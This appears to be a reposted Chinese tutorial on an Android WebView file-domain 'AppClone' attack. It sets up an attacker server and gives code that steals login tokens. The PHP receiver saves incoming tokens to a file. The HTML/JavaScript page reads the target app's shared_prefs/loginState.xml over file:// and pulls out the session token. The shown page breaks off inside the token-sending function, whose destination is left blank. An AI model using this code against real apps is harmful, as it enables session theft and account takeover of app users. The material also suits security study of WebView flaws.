虚拟sd卡000前言 在上一篇文章《 WebView域控不严

0×01实验环境

基础环境：win10,Android studio 3,eclipse(androidserver开发)，ubuntu12(hackserver)

模拟器：

要开发APP:AppClone，AttackAPP，StartClone

1、Androidserver

Login.jsp：根据用户名密码判断是哪个用户然后返回一个token给安卓端

Myinfo.jsp：根据token判断是哪个用户，然后返回其个人信息。

Code区域：以上代码比较简单，大家可以自行编写或在网上找一段改改，这里就不占地方了

2、Hackserver

Code区域：

Receve.php 主要用来接收APP传过来的token,并保存到newfile.txt中。

<?php
$data = $_GET["data"];
$myfile = fopen("/var/www/appclone/newfile.txt","w") or die("Unable to open file!");
fwrite($myfile, $data);
fclose($myfile);
?>

sendToken.htm 用来读取shared_prefs下保存的token并发送token到hackserver。

<html>

<script>

var token= "";

function iGetInnerText(testStr) {

var resultStr = testStr.replace(/\ +/g, ""); //去掉空格

resultStr = testStr.replace(/[ ]/g, ""); //去掉空格

resultStr = testStr.replace(/[\r\n]/g, ""); //去掉回车换行

return resultStr;

}

function loadXMLDoc()

{

var arm ="file:///data/data//com.example.test0.appclone/shared_prefs/loginState.xml";

var xmlhttp;

if (window.XMLHttpRequest)

{

xmlhttp=new XMLHttpRequest();

}

xmlhttp.onreadystatechange=function()

{

if (xmlhttp.readyState==4)

{

token= iGetInnerText(xmlhttp.responseText);

token= token.substr(token.length-34);

token= token.substr(0,19);

document.write(token);

sendToken();

}

}

xmlhttp.open("GET",arm);

xmlhttp.send(null);

}

function sendToken()

{

var arm = " ?data= "+token;

var xmlhttp2;

if (window.XMLHttpRequest)

{

xmlhttp2=new XMLHttpRequest();

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/shouji/article-85138-1.html